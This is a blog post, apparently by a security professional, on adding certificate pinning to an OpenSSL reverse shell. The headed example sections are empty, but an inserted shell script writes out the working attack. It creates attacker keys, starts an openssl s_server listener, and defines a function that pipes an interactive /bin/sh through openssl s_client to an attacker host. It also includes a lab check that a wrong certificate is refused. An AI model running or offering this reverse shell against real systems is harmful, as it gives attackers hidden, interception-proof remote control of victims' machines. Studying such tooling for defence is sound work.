
Openssl Reverse Shell with Certificate Pinning

Since my last article about reverse shells I have made some progress: I added support for certificate pinning. This adds another layer of security. The victim-side client trusts exactly one certificate, the one generated on the attacking machine, so an interceptor cannot take over the shell with a MITM attack unless they also hold the matching private key. That key therefore stays on the attacking machine; only the certificate travels to the victim.

Photo by Noah S on Unsplash

Example

Certificate

Create a certificate on the attacking machine:

Listener

Start the listener on the attacking machine:

Reverse Shell

Start the reverse shell on the victim machine through any form of code execution. Be sure to upload the certificate to the victim machine in a secure manner beforehand and make it readable for the shell.

The verification-depth option checks the certificate chain to a depth of 1, so it accepts only the one certificate provided in the pinned certificate file. This works for all self-signed certificates. If you use a longer certificate chain for whatever reason, you have to adjust this value accordingly.

The verification-error option terminates the connection if the certificate chain cannot be verified. You can test this in your lab by generating a second key pair and certificate and connecting with the “wrong” certificate. You will see that the connection comes in but is reset during the handshake due to the certificate error. You will be notified about that on the attacker machine, too. Seeing this in the wild is a sign that somebody tried to intercept your shell (or that the wrong certificate ended up on the target).
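The whole procedure (certificate, listener, pinned reverse shell, and the "wrong certificate" lab test from the previous two paragraphs) as one runnable script. This is an added example, not the article's own commands, which are not reproduced on this page. It assumes the `openssl` binary is on PATH, that the listener is `openssl s_server`, and that the pinned client is `openssl s_client -verify 1 -CAfile <cert> -verify_return_error`; the file names, the CN values, the default port 4444 and the script name pinlab.sh are made up for the lab.

```sh
#!/bin/sh
# Lab harness for OpenSSL certificate pinning on a reverse shell.
# Added example, not the article's own commands. Assumptions: `openssl` is on
# PATH, the listener is `openssl s_server`, the pinned client is
# `openssl s_client -verify 1 -CAfile <cert> -verify_return_error`.
# File names, CN values, port and script name (pinlab.sh) are made up.

WORK="${TMPDIR:-/tmp}/pinlab.$$"

# Self-signed key pair + certificate. The attacker keeps <name>.key private and
# ships only <name>.crt to the victim: that file is the whole trust store there.
make_cert() {                     # make_cert <name>
    mkdir -p "$WORK"
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=$1" \
        -keyout "$WORK/$1.key" -out "$WORK/$1.crt" >/dev/null 2>&1
}

# Attacker side: TLS listener presenting <name>'s certificate. Its stdin is a
# fifo held open on fd 3, because s_server -quiet busy-loops on an EOF stdin.
start_listener() {                # start_listener <name> <port>
    mkfifo "$WORK/stdin"
    openssl s_server -quiet -port "$2" -key "$WORK/$1.key" -cert "$WORK/$1.crt" \
        <"$WORK/stdin" >/dev/null 2>&1 &
    LISTENER_PID=$!
    exec 3>"$WORK/stdin"
    sleep 2                       # give it time to bind before the first probe
}

stop_listener() {
    kill "$LISTENER_PID" 2>/dev/null || true
    exec 3>&-
}

# One pinned probe connection. -verify 1 -CAfile <cert> trusts exactly that
# certificate, -verify_return_error aborts the handshake (non-zero exit) on any
# verification error, and -no_ign_eof undoes the -ign_eof implied by -quiet so
# the probe exits on stdin EOF instead of staying open like the real shell.
pinned_connect() {                # pinned_connect <port> <cert>
    printf 'ping\n' | openssl s_client -quiet -no_ign_eof \
        -connect "127.0.0.1:$1" -verify 1 -CAfile "$2" -verify_return_error \
        >/dev/null 2>&1
}

# Victim side as deployed for real (not run by run_lab): an interactive shell
# plumbed through the pinned client via a fifo. Only the attacker's certificate
# is trusted, so a MITM without the matching private key cannot complete the
# handshake and never sees the shell.
reverse_shell() {                 # reverse_shell <attacker-host:port> <cert>
    fifo="${TMPDIR:-/tmp}/.rs.$$"
    mkfifo "$fifo"
    /bin/sh -i <"$fifo" 2>&1 | openssl s_client -quiet -connect "$1" \
        -verify 1 -CAfile "$2" -verify_return_error >"$fifo"
    rm -f "$fifo"
}

# The lab test from the article: the genuine certificate must be accepted and a
# second key pair ("impostor") must be rejected during the handshake. Returns 0
# when both hold.
run_lab() {                       # run_lab [port]
    port="${1:-4444}"
    make_cert attacker && make_cert impostor || return 1
    start_listener attacker "$port"
    ok=1
    pinned_connect "$port" "$WORK/attacker.crt" || ok=0   # expected: accepted
    pinned_connect "$port" "$WORK/impostor.crt" && ok=0   # expected: rejected
    stop_listener
    rm -rf "$WORK"
    [ "$ok" -eq 1 ]
}

# Stand-alone usage: sh pinlab.sh [port]
if [ "${0##*/}" = "pinlab.sh" ]; then
    run_lab "$@" && echo "pinning OK: genuine cert accepted, impostor cert rejected"
fi
```

In the real deployment only `reverse_shell` runs on the victim, with the attacker's certificate copied there beforehand; `run_lab` exists purely to reproduce the handshake reset you should see when somebody presents a certificate other than the pinned one.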

If you encounter any problems or bugs, please feel free to contact me. I would like to make this reverse shell as secure and usable as possible.

Note: If you like to use Metasploit instead of a classic reverse shell you will love the Meterpreter Paranoid Mode.

Written by

www.honze.net — 1+1=10, Hacker, Nerd, former Soldier, working as InfoSec Pro — München
